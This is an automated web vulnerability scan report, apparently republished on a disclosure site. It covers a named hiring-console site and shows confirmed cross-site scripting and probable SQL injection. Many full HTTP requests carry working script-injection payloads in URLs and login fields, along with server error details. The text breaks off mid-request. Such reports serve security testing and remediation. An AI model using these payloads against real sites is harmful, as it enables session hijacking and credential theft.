Netsparker, Web Application Security Scanner

SQL Injection, XSS, Cross Site Scripting in hourly.deploy.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Netsparker - Scan Report Summary
TARGET URL
https://hourly.deploy.com/hmc/report/index.cf...
SCAN DATE
7/23/2011 11:44:19 AM
REPORT DATE
7/23/2011 12:07:42 PM
SCAN DURATION
00:05:33

Total Requests

Average Speed

req/sec.
25
identified
17
confirmed
1
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
4 %
IMPORTANT
76 %
LOW
12 %
INFORMATION
8 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/CFIDE/componentutils/cfcexplorer.cfc/%22ns=%22alert(0x000ABD) URI-BASED Raw URI Cross-site Scripting No
/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C97%2529) URI-BASED Raw URI Cross-site Scripting No
/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C98%2529) URI-BASED Raw URI Cross-site Scripting No
/CFIDE/componentutils/cfcexplorer.cfc/%2522ns%253D%2522netsparker%25280x000C99%2529) URI-BASED Raw URI Cross-site Scripting No
/hmc/ Query Based QUERYSTRING Cross-site Scripting Yes
/hmc/index.cfm Query Based QUERYSTRING Cross-site Scripting Yes
j_username POST Cross-site Scripting Yes
/hmc/report/ Query Based QUERYSTRING Cross-site Scripting Yes
Cookie Not Marked As Secure Yes
Auto Complete Enabled Yes
Cookie Not Marked As HttpOnly Yes
/hmc/report/index.cfm Query Based QUERYSTRING Cross-site Scripting Yes
j_username POST Cross-site Scripting Yes
Apache Version Disclosure No
E-mail Address Disclosure No
/hmc/setup/responsefollowupnew.cfm Query Based QUERYSTRING Cross-site Scripting Yes
/styles/albertson2_3_production_Sep24/ Directory Listing (Apache) No
/webservices/localeService.cfc questionID GET [Probable] SQL Injection No
method GET Cross-site Scripting Yes
/webservices/questionService.cfc method GET Cross-site Scripting Yes
method GET Cross-site Scripting Yes
method GET Cross-site Scripting Yes
method GET Cross-site Scripting Yes
/webservices/responseService.cfc method GET Cross-site Scripting Yes
method GET Cross-site Scripting Yes
[Probable] SQL Injection

[Probable] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /webservices/localeService.cfc

/webservices/localeService.cfc

https://hourly.deploy.com/webservices/localeService.cfc?method=getLocalByQuestionIDServiceData&quest..

Parameters

Parameter Type Value
method GET getLocalByQuestionIDServiceData
questionID GET %27

Request

GET /webservices/localeService.cfc?method=getLocalByQuestionIDServiceData&questionID=%2527 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/javascript/locale.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630aaffa7c9434d5d31
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:50:56 GMT
Server: Apache/2.0.46 (Red Hat)
server-error: true
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:50:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">


<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Error Executing Database Query.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][Oracle JDBC Driver][Oracle]ORA-01722: invalid number
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


<tr><td>

<table border="0" cellpadding="0" cellspacing="0">

</table>
</td></tr>

<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debugging Settings, and select the Robust Exception Information option.</li>

<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://hourly.deploy.com/hmc/javascript/locale.js</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">23-Jul-11 12:50 PM</td>
</tr>
</table>
</td>
</tr>
</table>


</font>
</td>
</tr>
</table>
</body></html>


Cross-site Scripting

Cross-site Scripting

18 TOTAL
IMPORTANT
CONFIRMED
14
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /hmc/

/hmc/ CONFIRMED

https://hourly.deploy.com/hmc/?'"--></style></script><script>alert(0x00004C)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00004C)</script>

Request

GET /hmc/?'"--></style></script><script>netsparker(0x00004C)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/index.cfm?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630c0aeb4b14b2e4d75
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:48:54 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:48:54 GMT;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:48:54 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:48:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8







































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/index.cfm?'"--></style></script><script>netsparker(0x00004c)</script>" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?'"--></style></script><script>netsparker(0x00004C)</script>&register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center">

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
- /hmc/report/index.cfm

/hmc/report/index.cfm CONFIRMED

https://hourly.deploy.com/hmc/report/index.cfm?'"--></style></script><script>alert(0x000091)</script>

Parameters

Parameter Type Value
register GET 1
Query Based QUERYSTRING '"--></style></script><script>alert(0x000091)</script>

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x000091)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630c0aeb4b14b2e4d75
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:48:56 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:48:56 GMT;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:48:56 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:48:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8







































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/report/index.cfm?'"--></style></script><script>netsparker(0x000091)</script>" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?'"--></style></script><script>netsparker(0x000091)</script>&register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center">

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
- /hmc/report/

/hmc/report/ CONFIRMED

https://hourly.deploy.com/hmc/report/?'"--></style></script><script>alert(0x00004D)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00004D)</script>

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x00004D)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/index.cfm?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630c0aeb4b14b2e4d75
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:48:54 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:48:54 GMT;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:48:54 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:48:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8







































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004d)</script>" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?'"--></style></script><script>netsparker(0x00004D)</script>&register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center">

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
- /hmc/index.cfm

/hmc/index.cfm CONFIRMED

https://hourly.deploy.com/hmc/index.cfm?'"--></style></script><script>alert(0x00010A)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00010A)</script>

Request

GET /hmc/index.cfm?'"--></style></script><script>netsparker(0x00010A)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=2630c0aeb4b14b2e4d75
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:49:01 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:49:01 GMT;path=/,CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:49:01 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:49:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8







































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/index.cfm?'"--></style></script><script>netsparker(0x00010a)</script>" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?'"--></style></script><script>netsparker(0x00010A)</script>&register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center">

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
- /hmc/index.cfm

/hmc/index.cfm CONFIRMED

https://hourly.deploy.com/hmc/index.cfm?

Parameters

Parameter Type Value
j_password POST 3
j_username POST "><script>alert(9)</script>

Request

POST /hmc/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Cookie: JSESSIONID=2630c0ae5647d144e225
Content-Length: 70
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

j_password=3&j_username=%22%3e%3cscript%3enetsparker(9)%3c%2fscript%3e

Response

HTTP/1.0 200 OK
Date: Sat, 23 Jul 2011 16:49:13 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Fri, 23-Jul-2010 16:49:13 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Cache-Control: max-age=0
Expires: Sat, 23 Jul 2011 16:49:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8





















































































































































































































































































































































































































































<html><head><title>Login</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css"><script src="../javascript/display.js" type="text/javascript"></script></head><body onLoad="document.form1.j_password.focus();" link="#666666" vlink="#666666" alink="#666666"> <form name="form1" action="/hmc/index.cfm?" method="post"><p>&nbsp;</p>

<TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="340"><!-- RoundedBox Table -->

<TR>
<TD class="FlexBox_ul"></TD>
<TD class="FlexBox_top"></TD>
<TD class="FlexBox_ur"></TD>
</TR>

<TR>
<TD class="FlexBox_left"></TD>
<TD class="FlexBoxContent">



<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td height="86" align="center"> <a href="http://www.deploy.com"><img src="/images/logo.jpg" border="0"></a> </td> </tr> <tr> <td height="46" class="formCopy" align="center"> <br/> Welcome to<strong> Kronos Hiring Management Console</strong>.<br/> <br/> Please enter your username and password. <br> <br/> New user? <a href="?register=1">Click here</a> to register. <br/> </td> </tr> <tr> <td height="155" align="center"> <script> function checkEnter() { if (window.event.keyCode == 13) /* they hit enter */ document.form1.submit(); } </script> <table border="0" cellpadding="3" cellspacing="0" width="300" height="100"> <tbody> <tr> <td class="fieldLabel">Username:</td> <td><input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value=""><script>netsparker(9)</script>" onKeyPress="checkEnter();"></td> </tr> <tr> <td width="100" class="fieldLabel">Password:</td> <td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td> </tr> <tr> <td colspan="2" height="20" align="center"> <span class="error"> Invalid username or password. </span><br/> <br/>

<table id="loginBtn" class="Button" height="19" border="0" cellpadding="0" cellspacing="0" align="center">

<tr>
<td class="flexbtn_l"></td>
<td class="flexbtn_m" nowrap>

<a access= "1" class="flexbtn_m" tabindex="3" href="javascript:document.form1.submit();"

title="Login&nbsp;>" >


&nbsp;&nbsp;Login&nbsp;>&nbsp;&nbsp;



</a>
</td>
<td class="flexbtn_r"></td>
</tr>

</table>
</td> </tr> </tbody> </form> </table> </td> </tr> </table> </td> </tr></table>

</TD>
<TD class="FlexBox_right"></TD>
</TR>

<TR>
<TD class="FlexBox_ll"></TD>
<TD class="FlexBox_bot"></TD>
<TD class="FlexBox_lr"></TD>
</TR>
</TABLE>



<p>&nbsp;</p></body></html>
- /hmc/report/index.cfm

/hmc/report/index.cfm CONFIRMED

https://hourly.deploy.com/hmc/report/index.cfm?

Parameters

Parameter Type Value
j_password POST 3
j_username POST "><script>alert(9)</script>

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
